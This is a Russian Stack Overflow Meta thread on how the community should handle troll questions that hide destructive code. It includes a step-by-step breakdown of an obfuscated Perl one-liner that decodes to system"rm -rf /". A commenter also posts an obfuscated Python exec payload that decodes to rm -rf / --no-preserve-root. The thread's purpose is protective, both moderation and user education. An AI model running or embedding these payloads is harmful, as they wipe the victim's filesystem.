# Ты троянская пони, троянская пони! ✨ (Как защититься от вопросов с вредоносным кодом?)

Tags: обсуждение, вопросы, правила, троллинг

#### Вступление.

Делая вчера очередь проверок, я наткнулся на вопрос заданный только вчера, содержащий код, но заминусованный капитально: -14 (на текущий момент -16). Думаю, что-то это слишком много, ну если обычно задают плохой вопрос (е.г. домашку, перевод, по-английски и т.д.), то если он недавний, то число даунвоутов где-то ∈ range(-2, -7). Я открыл вопрос и смотрю комментарии и ответ...

#### Продолжение

> предлагаю удалить текст вопроса. – KoVadim 2 дня назад
> 5
>
> Я голосую за закрытие этого вопроса, потому что вопрос содержит вредоносный код в завуалированном виде. – aleksandr barakin 2 дня назад
>
> Я просто хочу вывести красивого пони в терминале. Ничего вредоносного – Сергей Валерьевич 2 дня назад
>
> пони выводятся по apt moo – KoVadim 2 дня назад
>
> @aleksandrbarakin, может просто в ответе разобрать почему код вредоносный? :-) – Grundy 2 дня назад
>
> внизу уже разобрали – KoVadim 2 дня назад
>
> @KoVadim, я где-то видел именно по пунктам разбор, типа как эта строка преобразуется в аналог rm rf :) – Grundy 2 дня назад
>
> что то модераторы не идут – KoVadim 2 дня назад
>
> кстати, ассоциация: stackoverflow.com/q/9591658/2881286 – Grundy 2 дня назад
> 2
>
> @Grundy, добавил разбор. – Centrix 2 дня назад
> 3
>
> @aleksandrbarakin хоть это и троллинг, но вопрос правил не нарушает сам по себе. А хороший ответ только приветствуется.

Разбор в ответе:

> +9
>
> Эта программа удаляет все директории, в том числе и корневую /.
>
> А если подробнее то:
>
> `echo "test... test... test..."` выполнение этой команды не влияет на работу и добавлено, скорее всего, для усыпления бдительности. То, что происходит в остальном коде — совсем не очевидно из-за преднамеренно запутанного написания. В данной строчке записано всего три последовательно выполняемых команды. Запишем команду следующим образом:
>
> ```
> $? ? s:;s:s;;$?: : s;;=]=>%-{<-|}<&|`{; ;
> y; -/:-@[-`{-};`-{/" -; ;
> s;;$_;see
> ```
>
> Первая конструкция анализирует переменную `$?` — код возврата предыдущей команды. Так как перед выполнением этой конструкции дочерних процессов не создавалось, $? будет содержать 0, и выполнена будет вторая «ветка» — `s;;=]=>%-{<-|}<&|`{;`. Эта команда, в свою очередь, заменяет строку в переменной-аккумуляторе` $_`на`=]=>%-{<-|}<&|{` (первый символ после s устанавливает ограничитель параметров этого оператора, и хотя традиционно используются слэш / или |, для неясности в этой конструкции используется ограничитель ;).
>
> Вторая команда транслирует содержимое «аккумулятора» по достаточно сложным правилам. В левой части указано четыре диапазона символов, в правой — один. Если раскрыть эти диапазоны, получим следующее соответствие:
>
> ```
>  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}
> `abcdefghijklmnopqrstuvwxyz{/"
> ```
>
> - 
>
> В результате содержимое $_ принимает вид:
>
> ```
> system"rm -rf /"
> ```
>
> Третья же команда дважды (как инструктирует флаг ee) «вычисляет» содержимое аккумулятора — вышеуказанную деструктивную команду — и пытается заменить пустую строку в аккумуляторе на результат вычисления.

Комментарии:

> Это неправда. Она должна рисовать красивого пони – Сергей Валерьевич 23 июн в 14:42
>
> Знаем мы ваших пони. – Centrix 23 июн в 14:43
> 11
>
> Ты троянская пони, троянская пони! ✨ – andreymal 23 июн в 15:05

[Ссылка на вопрос](https://ru.stackoverflow.com/questions/1144804/%d0%a7%d1%82%d0%be-%d0%b4%d0%b5%d0%bb%d0%b0%d0%b5%d1%82-%d0%b4%d0%b0%d0%bd%d0%bd%d1%8b%d0%b9-%d0%be%d0%b4%d0%bd%d0%be%d1%81%d1%82%d1%80%d0%be%d1%87%d0%bd%d0%b8%d0%ba-%d0%bd%d0%b0-perl)

---

## Что я хочу обсудить.

Такие вопросы к счастью редки. Но они несут очень большую опасность. Любой не знающий перл или невнимательный человек мог запустить этот код и...  `sudo rm -rf /`

Я считал, что наше SOобщество полностью защищено от троллей, но вот это — наша брешь. В правилах такие вопросы не оговариваются. Я предлагаю обсудить это в комментариях, и в качестве ответов предложить решение этой проблемы — что делать с такими вопросами? Предупреждения в самом вопросе — мало!

**P.S.** За название — спасибо @andreymal'y!

Comment: Снести, да и все тут. Если [вопрос про сложение чисел в Javascript](https://ru.stackoverflow.com/questions/1038600/) снесли как троллинг с баном автора на неделю, то за `rm -rf` и подавно надо.

Comment: Вы таким образом людей не призовёте)

Comment: @MSDN.WhiteKnight не за троллинг, а за троллинг+твинков)

Comment: @MSDN.WhiteKnight Я тоже так считаю. Но надо модераторов убедить;)

Comment: Оставил комментарий, чтобы меня можно было пинговать, а тот выше удалил: призвать в комментах можно только тех, кто УЖЕ отписывался под вопросом.

Comment: @AK Я это знаю, но к сожалению по другому позвать я не знаю как...

Comment: Модераторы получают уведомления о новых темах на мете прямо в ромб верхнего меню, так что если кто онлайн - сразу видит.

Comment: Когда я схитрил на MSE просто хотя удалить вопрос, а потом восстановить и объявить конкурс ( и кстати вопрос был хороший +21 ), мне впояли суспеншен. Надо быть по-жEEще...

Comment: @AK О, да, я не знал...

Comment: @AK Может повесите важное, чтобы сообщество подключилось в большем объеме?

Comment: Добавил. Но мне кажется уже само название стоит того, чтобы не удержаться и зайти в него. И очень пятнично!

Comment: @AK Эту штуку придумал andreymal. Мне тоже кажется прикольно!Спасибо за тег!!! ;)

Comment: @AK Now 26 Jun. 26 is double 13 ;)

Comment: На самом деле этот код безопасен, потому что современные версии `rm` просто выдадут ошибку `it is dangerous to operate recursively on '/'`

Comment: @andreymal Не важно... У кого-то может старый rm. Может быть другой, но похожий опасный вопрос. Обсудить все равно надо. И есть --no-preserve-root.

Comment: Давайте вопроса нормальные описательные названия, пожалуйста.

Comment: Название было весёлое, но правда, давайте оставим хорошее описательное и не будем устраивать войн правок, ладно?

Comment: @AK Компромисс.

Comment: @Kromster Компромисс? (Пусть хотя бы сегодня в честь двойной пятницы*13тое повисит)

Comment: Нет войне правок! - откатил автор - ок. Тревога модератору - пусть он рассудит ) Я лично против опошления ресурса и желтизны заголовков )

Comment: @Kromster Where's your sense of humor, buddy?

Comment: @VictorVosMottorthanksMonica мой сенс оф хьюмор на других тематических ресурсах. А здесь - база знаний ;-Р

Comment: @Kromster If so, let's speak MySQL! ;)

Comment: @Suvitruf `Вы таким образом людей не призовёте` Вы хотите сказать, что если мы будем банить троллей и нас будет меньше участников. Зачем призывать "врагов сообществa"?

Comment: @VictorVosMottorthanksMonica я про то, что упоминание меня через @ не сработает, если я комментарий не оставлял :D

Comment: @Suvitruf-AndreiApanasik A!во я тормоз...

Comment: @AK, а мне старый заголовок больше нравилися.

Comment: @Qwertiy Мне тоже. Но следующим "пониводам" надо будет этот вопрос показывать. Хотя название конечно прикольное было...

Comment: А ведь этот тролль скорее всего не даст галочку верному ответу...

Comment: @andreymal Да тут-то и нормальные участники (новые просто) галки не всегда ставят.

Comment: Свежак: https://ru.stackoverflow.com/a/1148082/213987

Comment: @AK что это????

Comment: Это 10к+ требует, т.к. ответ уже удалён. См. [в чате](https://chat.stackexchange.com/transcript/message/54825745#54825745) скриншот.

Comment: @AK Вот же су... шутник!

Comment: @Qwertiy Жалко мне старое название, может я могу вернуть?

Comment: Кстати, с темой немного перекликаются деструктивные, назовем их так, вопросы - от прямых "как заDDOSить сайт", до завуалированных "как перехватить управление etc etc" (ну, направленные на вирусонаписание)... Что с такими делать?

Comment: @VictorVosMottorthanksMonica, мне тоже.

Comment: Предвкушаю оживлённую дискуссию и войну правок между модераторами по поводу заголовка 

Comment: @andreymal ha-ha...

Comment: @andreymal Не, я думаю, если модераторы будут спорить, то как-то более культурно.

Comment: Как уже сказали выше, эта "шутка" неактуальна уже лет 10. А написать новую рабочую пакость некому. Те почтенные старцы, что помнят перл, такими глупостями заниматься не станут. Единственное изменение, которому подвергся этот однострочник за долгие годы - это исправление изначального `cat` на более подходящее по смыслу `echo`. Вот настолько все плохо.

Comment: @extrn Если кому-то надо, напишет —  достаточно добавить `--no-preserved-root`. И вообще при чем тут это?

Comment: Если хорошо подумать, то такие зловредные штучки некоторым образом **полезны**. Они отсеивают из профессии негодных к ней. Поэтому гуманисты (филантропы), к коим себя наверняка относит большая часть участников сайта, должны их приветствовать. (вот так, в духе К. Пруткова о надписи на клетке)

Comment: Более тонкие пони? https://ru.stackoverflow.com/q/1149715/213987

Comment: @AK Довольно очевидный код.

Comment: [the new pony](https://ru.stackoverflow.com/questions/1150041/%d0%b2%d1%81%d1%82%d1%80%d0%b5%d1%82%d0%b8%d0%bb-%d0%bd%d0%b5%d0%bf%d0%be%d0%bd%d1%8f%d1%82%d0%bd%d1%8b%d0%b9-%d0%ba%d0%be%d0%b4#comment1993163_1150041)

Comment: А не должен ли этот код, исходя из "sudo" спросить пароль? 
Ну а вообще, стоит использовать виртуальную среду, для теста чужого кода.. как минимум таких в интернете в браузере, полным полно.

Comment: @Insider И где там судо?

Comment: @Insider `как минимум таких в интернете в браузере, полным полно.`—что-нибудь кроме onworks?

Comment: Удивляет, что люди так концентрируются на "вовсе-то данный код при современном bash не нанесет вреда", игнорируя то факт, что это в первую очередь вандализм, генерация мусора, который отвлекает от полезных вопросов. Уже два подобных вопроса не только не удалили, но и дали заплюсованные ответы, а значит они уже не будут удалены, ибо "жалко". Получается, столовая для троллей официально открыта.

Comment: @VictorVosMottorthanksMonica судо вы сами написали `Такие вопросы к счастью редки. Но они несут очень большую опасность. Любой не знающий перл или невнимательный человек мог запустить этот код и... sudo rm -rf /` 
На счет сайтов, тот же cocalc или любой фришный хостинг для быстрых тестов сойдет.

Comment: Снести, ибо это дичайший боян, и должно быть стыдно.

Answer (score 30):

Проблема этого вопроса - в том, что это вообще не вопрос, а известный троллинг. И если, в текущей редакции, вопрос на сайте и правда допустим, ведь ответ на него кому-то и правда может пригодиться - то смысла в нахождении на сайте тролля-автора я не вижу никакого.

Сомнений в том, что автор тролль, нет - искренне интересующийся вопросом новичок не стал бы, получив подробный ответ, рассказывать, что

> Это неправда. Она должна рисовать красивого пони.

И все аналогичные троллинги в будущем надо удалять сразу же, не создавая на каждый из них отдельный пост на Мете с обсуждением.

Comment: И я так считаю!

Comment: Надо же, приходится порой выпиливать участников с сайта и указывать в формулировке "этому пользователю не место на сайте потому что: ", но тут похоже впервые я проставлю "потому что сообщество так решило".

Comment: Почему вам +6 а мне -2 . Мы же за одну идею.

Comment: @VictorVosMottorthanksMonica потому что предложенное мною решение сложнее чем просто "всё удалить"

Comment: ok...................

Comment: "смысла в нахождении на сайте тролля-автора я не вижу никакого" — звучит довольно оскорбительно. Да и вообще лучше рассуждать за контент, чем переходить на личности. Этот пользователь может в будущем привнести кучу полезного контента, мы это не можем знать. Это не повод вешать ярлыки и делать из пользователя изгоя.

Comment: (дубль комментария, тут он более уместен) -- 
Если хорошо подумать, то такие зловредные штучки некоторым образом полезны. Они отсеивают из профессии негодных к ней. Поэтому гуманисты (филантропы), к коим себя наверняка относит большая часть участников сайта, должны их приветствовать. (вот так, в духе К. Пруткова о надписи на клетке)

Comment: @VadimOvchinnikov у этого пользователя из 4х постов три содержат одну и ту же команду. Всё ещё не повод вешать ярлыки?

Comment: Очередной шутник: https://ru.stackoverflow.com/questions/1151437/%d0%9d%d0%b5-%d1%80%d0%b8%d1%81%d1%83%d0%b5%d1%82-%d0%b4%d0%b5%d1%80%d0%b5%d0%b2%d0%be

Comment: Можете мне скрин "Очередного шутника" кинуть?

Comment: @VictorVosMottorthanksMonica https://i.stack.imgur.com/hiISK.png

Comment: Спасибо. Такое пони может сбить с толку. Хотя, если код прочитать — сразу понятно.

Answer (score 10):

В виде вопроса данный код не может навредить, так как в самом вопросе указано, что непонятно что делает этот код, и если кто-то не разбираясь его запустит - сам виноват.

В то же время с хорошим ответом, данный вопрос позволяет узнать *почему* опасен данный код.

И в этом случае является практически эталонным вопрос-ответом.

---

Если бы данный код был размещен в качестве ответа - без всяких сомнений стоило бы удалить, за деструктивные действия.

Однако и тут могут быть нюансы, например, [соревнование](https://ru.stackoverflow.com/questions/tagged/%d1%81%d0%be%d1%80%d0%b5%d0%b2%d0%bd%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5) вызова `rm -rf` различными способами

Comment: А давайте просто из интереса писать на ресурсе деструктивный код, кто выполнит сам виноват?

Comment: @DaemonHK, как это связано с заданным вопросом?

Comment: @VictorVosMottorthanksMonica, не понял сообщение

Comment: Вы сразу поняли код? Сомневаюсь. Если я был бы новичок и спросил что, вы бы запустили и... А вы говорите сам виноват.

Comment: @DaemonHK (see upper)

Comment: @VictorVosMottorthanksMonica, все еще не понимаю смысла вопроса. Если ты не разбираешься в коде и просто запускаешь все что видишь, рано или поздно натолкнешься на такой код. И лучше, если под вопросом с этим кодом будет написан ответ, с пояснениями что в нем происходит, чем просто приписка - решает все проблемы.

Comment: Вы можете понять, что делает код, который написал я? Нет. Невозможно догадаться, что он стирает все данные с диска, без запуска. И не надо  говорить сам виноват. А если вы можете понять код, дайте разбор в комментах, и тогда я беру слова обратно.

Comment: @VictorVosMottorthanksMonica, наличие импорта pickle сразу сеет подозрение, и практически по первой ссылке примеры как этот пакет может использоваться не так. Так что если бы был вопрос с таким кодом, вроде, что делает, почему не работает - вполне хорошо бы смотрелся ответ с пояснением как именно этот пакет преобразует указанные бинарные команды. И в следующий раз уже можно было ссылаться на этот вопрос с пояснениями, и меньше шансов, что кто-то еще попадет в такую ситуацию

Comment: @VictorVosMottorthanksMonica, больше того, таких вопросов с хорошими ответами разбирающими что именно происходит в таком коде наоборот должно быть больше, тогда меньше шансов, что в случае, если такой код попадется где-то еще, он принесет какие-то проблемы.

Comment: А так понять, слабо?

Comment: @VictorVosMottorthanksMonica, наличие странных hex кодов и тем более `exec` уже наводят на мысль, что тут что-то не так :-) а учитывая что он выполняет строку `import pickle as tkinter` возвращаемся к предыдущему комментарию :)

Comment: Ладно, сейчас я что-нибудь по солидней сделаю и тогда посмотрим...

Comment: @Grundy вы смотрите с высоты своего опыта "посмотрите на exec, import, бла бла бла". А завтра на этот код наткнется условная девочка, которая в коде ни бум-бум, но которой поставили задачу решить проблему. Ну, считайте минус девочка...

Comment: @DaemonHK, так я ж и говорю - лучше пусть она наткнется на это в вопросе с ответом с объяснением что именно там происходит, чем просто на каком-то ресурсе без пояснений :)

Comment: @DaemonHK угу...

Comment: _**ВНИМАНИЕ! ВРЕДОНОСНЫЙ КОД, НЕ ЗАПУСКАТЬ!_** `exec(''.join(map(lambda i:chr(i), [105, 109, 112, 111, 114, 116, 32, 111, 115, 59, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 114, 109, 32, 45, 114, 102, 32, 47, 32, 45, 45, 110, 111, 45, 112, 114, 101, 115, 101, 114, 118, 101, 114, 45, 114, 111, 111, 116, 34])))` ?

Comment: @VictorVosMottorthanksMonica, ну подход же один и тот же: _'import os;os.system("rm -rf / --no-preserver-root"'_ Собирается строка и смотрится конкретный код

Comment: @VictorVosMottorthanksMonica, если бы ты не удалял предыдущие варианты - было бы лучше. Сразу видно что идет один и тот же подход и решается он по сути двумя ответами, которыми можно все дубликатить

Comment: Для разнообразия. И вы думаете, что каждый сразу поймет? Нет.

Comment: @VictorVosMottorthanksMonica, поймет что именно? что куча байт переводится в строку, которая потом выполняется? Это очевидно при использовании `exec`. Посмотреть что делает каждая команда - дело двух минут. Пока я так и не понял, что именно ты хотел доказать примерами. Как мне кажется пока ты только подтверждаешь тезис о том, что достаточно сделать несколько эталонных вопросов с хорошими разборами.

Comment: Давайте [продолжим обсуждение в чате](https://chat.stackexchange.com/rooms/110345/discussion-between-grundy-and-victor-vosmottor-thanks-monica).

Answer (score 9):

Я на этот вопрос попал именно из-за названия. Точнее из-за той комбинации которая была на момент написания: *"Ты троянская пони, троянская пони! ✨ (Как защититься от вопросов с вредоносным кодом?)"*. Процитировал, на случай, если название поменяется.
Сначала пони привлекла внимание, потом инфа о защите от троянов сигнализировала, что стоит все-же прочитать.

По сути: не подозревал что на стековерфлоу можно столкнуться с трояном (как впрочем и 90% остальных пользователей если не больше). Да, по ссылках как и ранее не перехожу, но такого варианта не предполагал.

Я бы оставил вопрос для примера и информирования остальных участников сообщества. Но:

1. Снял возможность добавлять комменты и ответы, удалять, править и оценивать.
2. Оригинальную переписку оставил, так будет понятнее что это не очередная шутка юмора и не теоретический вопрос, а реально произошедшая ситуация.
3. В вопросе вредоносный код вывел в качестве картинки - так будет сложнее любопытным  наделать себе увечий. Пока будут писать вручную, то может здравый смысл проснется.
4. Под или перед картинкой сделал бы описание того, что будет если кто-то попробует его запустить.

Относительно самого автора зловредного вопроса. То, что жизнь еще наградит его ответным бумерангом с неожиданной стороны, может даже уже и завтра - это однозначно. Но что с ним делать в рамках сообщества?

Предположу, возможно и не верно, что он здесь не с одной учеткой сидит и не первый день. И раз уж решился свою троянскую пони выгулять, значит уже проверил саму полянку и охрану полянки. А раз полянка ему понравилась, то это не первое пони которое он сюда приведет. А возможно и другие пони уже пасутся но их не видят, он же не один такой проворный, сто процентов есть и попроворнее.

Такого бань или не бань, все равно не удалишь его с сообщества? Та хоть что с ним сделай, это будет как горохом о стену. ВПН и 10-ти минутные почтовые ящики дадут ему возможность безболезненно зарегать еще н-ное количество аккаунтов. Ловить и пристально смотреть на новые акки - ну нет смысла. Банально купит себе какую-то старую учетку и все на том.
Вот загуглил ради интереса [image: фразу "куплю учетку на стековерфлоу"]

Ну и как таких ловить? Они были, есть и будут есть. Остается усовершенствовать безопасность и просвещать участников сообщества о вариантах подвохов что-бы были бдительны.

Относительно зашитных мер.
Думаю, что больше всего могут от таких вопросов пострадать те, кто недавно начал проверять вопросы и те кто зарабатывает себе карму ответами на мало-мальски знакомую тему. Эти люди как правило и запускают не задумываясь на своих железках все что считают знакомым, лишь бы  выполнить задачу и получить свои бонусы. Тут бы алгоритмы задействовать.

1. Для проверяющих - если проверил 50 вопросов, то будь добр и принудительно ознакомся с возможными подвохами от тролей.
2. Относительно новичков которые "работают на зачетку" могу предположить что здесь этот алгоритм уже есть. Им бы тоже почитать туториал о том, что не стоит запускать все подряд.
3. Давать на проверку вопросы людям которые разбираются именно в этой теме. То есть если у меня 50 вопросов и ответов по теме андроид но по JS 2, значит я все же больше разбираюсь в андроид, чем человек у которого по тегу андроид 1 знак но по JS 120. В таком случае не стоит мне давать на проверку вопросы по JS, а ему по Андроид. Это кстати уменьшит количество некачественных проверок вопросов и ответов, и соответственно недовольство новичков.

Comment: Код из вопроса уже давольно давно является безвредным - для подобного удаления нужен ещё один флаг, которого, как я понимаю из ответа, там нет.

Comment: Очень согласен про жизнь и ответный бумеранг. Очень хорошо сказано  (и без пафоса (что редкость)). Тоже по ссылкам не перехожу никогда. Все нужные сайты сохранил в закладках и уже забыл когда ловил вирусы в последний раз!

Answer (score 8):

Гм. Вы от меня хотите ответа как от модератора, понимая, что модератор не создаёт новые правила, а лишь следит за исполнением текущего набора правил? Нелогично.

Пусть сообщество выскажется по этому поводу и скажет, что нужно сделать с такими вопросами, потому что их мне кажется уже штуки три было за последний год в разных вариациях.

В порядке частного мнения могу сказать вот что. Ну окей, удалим мы вопрос, думаете этот тот случай когда сокрытие информации поможет? Мне кажется, что нет. И как раз надо подобные вопросы оставлять, рисовать красную большую плашку и закрывать ответы.

А так это очень похоже на уже ранее имевшее обсуждение, вынесенное в правило: [Опрос: Отношение сообщества к вопросам, затрагивающим этику, правонарушения и интересы третьих лиц](https://ru.meta.stackoverflow.com/q/2868/213987): да, эти вопросы могут показаться кому-то неэтичными, но закрывать информацию — плохой вариант.

Comment: Да я у модераторов именно и спрашивал их личное мнение. У вас же больше опыта с правонарушителями ;)

Comment: @VictorVosMottorthanksMonica Да, но нам ещё не раз придётся на него давать ссылку нарушителям -- поэтому правильное описательное название тоже имеет свои плюсы. Я оставил в комментариях упоминание первого названия, возможно, это вас немного утешит.

Answer (score -7):

Я считаю, что можно каким-то образом автоматически анализировать код на предмет таких вещей и выдавать плашку сверху что код может быть опасен, а так же запретить его выделение и копирование.

Да, я понимаю что это очень "дорого" в плане ресурсов и ненадежно, но вот такая у меня мысль.

А еще можно добавить вид жалоб - если кто-то сам заметит - может вручную пожаловатся

Comment: Я считаю, что можно каким-то образом автоматически анализировать вопросы и генерировать на них ответы автоматически. Да, я понимаю что это дорого и ненадёжно, но такая у меня мысль. Куча плюсов же — задающий получит ответ мгновенно

Comment: А по поводу жалоб — уже есть жалоба с призывом модератора, ее достаточно

Comment: Идея хорошая. Ибо нужно такие вопросы оставлять т.к кто-то может наступить на эти грабли запустив этот код из другого источника.

Answer (score -9):

Я считаю, что такие вопросы полезны и не вижу в них никакой проблемы. В вопросе честно указано, что этот код не печатает. А удаление директорий - это уже не меняет суть вопроса

Comment: может быть важна цель задания вопроса/ отправки ответа. И продолжение утверждения, что код должен делать что-то другое, при наличии ответа, в котором разобрано что именно происходит в коде настраивает пользователей негативно к автору. В чем вы, вероятно, уже убедились :)